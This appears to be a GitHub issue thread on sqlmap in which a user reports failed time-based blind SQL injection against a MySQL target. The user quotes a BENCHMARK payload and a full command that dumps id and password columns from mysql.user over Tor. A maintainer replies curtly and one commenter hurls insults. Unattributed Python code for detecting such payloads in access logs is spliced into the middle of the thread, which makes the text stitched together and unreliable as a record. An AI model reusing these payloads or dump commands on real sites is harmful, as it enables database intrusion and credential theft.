sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

time based blind #660

Closed testerqwerty closed 10 years ago

testerqwerty commented 10 years ago

Heavy queries: why can't sqlmap enumerate table names and column names from the enumerated database? switch --dbs

Place: (custom) POST
Parameter: #1*
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: test=' AND 1356=BENCHMARK(10000000,MD5(0x6d65436e)) AND 'erCv'='erCv&submit=submit

---

[ERROR] unable to retrieve the number of databases
[INFO] falling back to current database
[INFO] fetching current database
[INFO] resumed: mysql
available databases [1]:
[*] mysql

switch --tables -D mysql
[INFO] testing MySQL
[INFO] confirming MySQL
[INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 4.4.7
back-end DBMS: MySQL < 5.0.0
[ERROR] information_schema not available, back-end DBMS is MySQL < 5.0
do you want to use common table existence check? [y/N/q] N
No tables found

switch --common-tables returns bullshit
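The BENCHMARK payload in this report is a heavy-query delay primitive: sqlmap infers each bit of a value from whether the response comes back slow, which is why high-latency paths (Tor, as raised later in the thread) make the inference unreliable. On the receiving side the same property makes these probes easy to spot. The following is an added example (my code, not sqlmap's and not from the issue author) of a small detector over constructed nginx-style access log lines; the log format, the 5-second threshold and the sample addresses are assumptions. It URL-decodes each request and expands MySQL 0x hex literals (sqlmap encodes string constants that way, as MD5(0x6d65436e) in the payload above shows) before matching delay primitives, and separately flags slow responses to requests that carry a quote character.

```python
import re
from urllib.parse import unquote_plus

# Assumed access log format (constructed for this example; nginx with $request_time):
#   $remote_addr [$time_local] "$request" $status $request_time
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<rt>\d+\.\d+)$'
)

# Delay primitives that time-based blind injection depends on. BENCHMARK only
# counts when the iteration count is large enough to produce a measurable delay.
DELAY_SIGS = {
    "mysql_benchmark": re.compile(r"\bBENCHMARK\s*\(\s*\d{4,}\s*,", re.I),
    "mysql_sleep": re.compile(r"\bSLEEP\s*\(\s*\d+(?:\.\d+)?\s*\)", re.I),
    "mssql_waitfor": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "pg_sleep": re.compile(r"\bPG_SLEEP\s*\(", re.I),
}
HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]{2,})\b")

# Seconds above which a request carrying a quote is treated as suspicious.
# Assumed value; derive it from the site's own response-time baseline.
SLOW_THRESHOLD = 5.0


def normalize(raw: str) -> str:
    """URL-decode (up to three layers) and expand MySQL 0x.. hex literals to
    quoted strings so signatures match what the database actually sees."""
    text = raw
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded

    def expand(m):
        try:
            return "'" + bytes.fromhex(m.group(1)).decode("utf-8", "replace") + "'"
        except ValueError:  # odd-length hex run: leave it untouched
            return m.group(0)

    return HEX_LITERAL.sub(expand, text)


def classify_request(raw_request: str) -> list:
    """Names of delay primitives found in a query string or body."""
    text = normalize(raw_request)
    return [name for name, rx in DELAY_SIGS.items() if rx.search(text)]


def analyze_log(lines) -> list:
    """Return (ip, reason, request_time) tuples. Two independent triggers:
    a delay primitive in the request, or a slow response to a request that
    contains a quote character (a cheap heuristic for injection probing)."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        rt = float(m.group("rt"))
        sigs = classify_request(m.group("path"))
        if sigs:
            alerts.append((m.group("ip"), "payload:" + ",".join(sigs), rt))
        elif rt >= SLOW_THRESHOLD and "'" in normalize(m.group("path")):
            alerts.append((m.group("ip"), "slow_quoted_request", rt))
    return alerts


def summarize_by_ip(alerts) -> dict:
    """Count alerts per source address; a blind-injection run produces hundreds."""
    counts = {}
    for ip, _reason, _rt in alerts:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


# Constructed sample lines. The first request carries the payload quoted in the
# issue; the third is a quoted request that is merely slow (for instance over a
# high-latency path such as Tor), which is exactly why timing inference is fragile.
SAMPLE_LOG = [
    '203.0.113.5 [02/Apr/2014:20:14:01 +0000] "GET /login.php?test=%27+AND+1356%3DBENCHMARK'
    '%2810000000%2CMD5%280x6d65436e%29%29+AND+%27erCv%27%3D%27erCv HTTP/1.1" 200 5.412',
    '203.0.113.5 [02/Apr/2014:20:14:08 +0000] "GET /login.php?test=%27+AND+SLEEP%285%29'
    '+AND+%27a%27%3D%27a HTTP/1.1" 200 5.087',
    '203.0.113.5 [02/Apr/2014:20:14:15 +0000] "GET /login.php?test=%27+AND+1%3D1+AND+%27a%27'
    '%3D%27a HTTP/1.1" 200 6.230',
    '198.51.100.7 [02/Apr/2014:20:15:00 +0000] "GET /login.php?test=alice HTTP/1.1" 200 0.031',
    '198.51.100.8 [02/Apr/2014:20:15:03 +0000] "GET /report.php?q=sleep+study HTTP/1.1" 200 0.044',
]

if __name__ == "__main__":
    for alert in analyze_log(SAMPLE_LOG):
        print(alert)
    print(summarize_by_ip(analyze_log(SAMPLE_LOG)))
```

The two triggers are kept separate on purpose: the signature match is high confidence on its own, while the slow-quoted-request rule is only a hint that needs the per-IP count behind it, since a single slow request on a high-latency path proves nothing, which is the same ambiguity that makes the attacker's side of the timing channel fragile.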

stamparm commented 10 years ago

It can. Please don't spam with this kind of issue without any info. On Apr 2, 2014 8:14 PM, "testerqwerty" notifications@github.com wrote:

why sqlmap cant enumerate table names and columns names from enumerated database?

testerqwerty commented 10 years ago

One more problem: enumerating blank fields, wtf?

sqlmap.py -u "example.com" --tor --tor-port=9150 --tor-type=socks5 --check-tor --batch --random-agent --hex --dump -D mysql -T user -C id,password --count --threads=10

[INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5
[INFO] resumed: 2672
Database: mysql
+--------+---------+
| Table  | Entries |
+--------+---------+
| `user` | 2672    |
+--------+---------+

[INFO] fetching columns 'id, password' for table 'user' in data base 'mysql'
[WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[WARNING] it's highly recommended to avoid usage of switch '--tor' for time-based injections because of its high latency time
[WARNING] time-based comparison requires larger statistical model, please wait.............................
[WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[INFO] retrieved:
[WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[ERROR] unable to retrieve the number of columns for table 'user' in database 'mysql'
[WARNING] unable to retrieve column names for table 'user' in database 'mysql'
[23:07:58] [INFO] fetching entries of column(s) 'id, password' for table 'user' in database 'mysql'
[23:07:58] [INFO] fetching number of column(s) 'id, password' entries for table 'user' in database 'mysql'
[23:07:58] [INFO] resumed: 2672
[23:07:58] [INFO] resumed: 2671
[23:07:58] [INFO] resumed: 2672
[23:08:05] [INFO] retrieved:
[23:08:11] [INFO] retrieved:
[23:08:19] [INFO] retrieved:
[23:08:26] [INFO] retrieved:
[23:08:32] [INFO] retrieved:
[23:08:39] [INFO] retrieved:
[23:08:46] [INFO] retrieved:
[23:08:46] [INFO] retrieved:

testerqwerty commented 10 years ago

First it counts the fields, then:

[ERROR] unable to retrieve the number of columns for table 'user' in database 'mysql'
[WARNING] unable to retrieve column names for table 'user' in database 'mysql'

wtf?

stamparm commented 10 years ago

It's time-based and you use Tor. In your place I would restrain myself from opening wtf issues.

testerqwerty commented 10 years ago

Without using Tor it's all the same.

ghost commented 10 years ago

stamparm.....how about you take the stick out of your ass, eh? Jesh....seriously..Why do you even do this? I read your comments; they're consistently condescending and unhelpful. Are you a cop or something?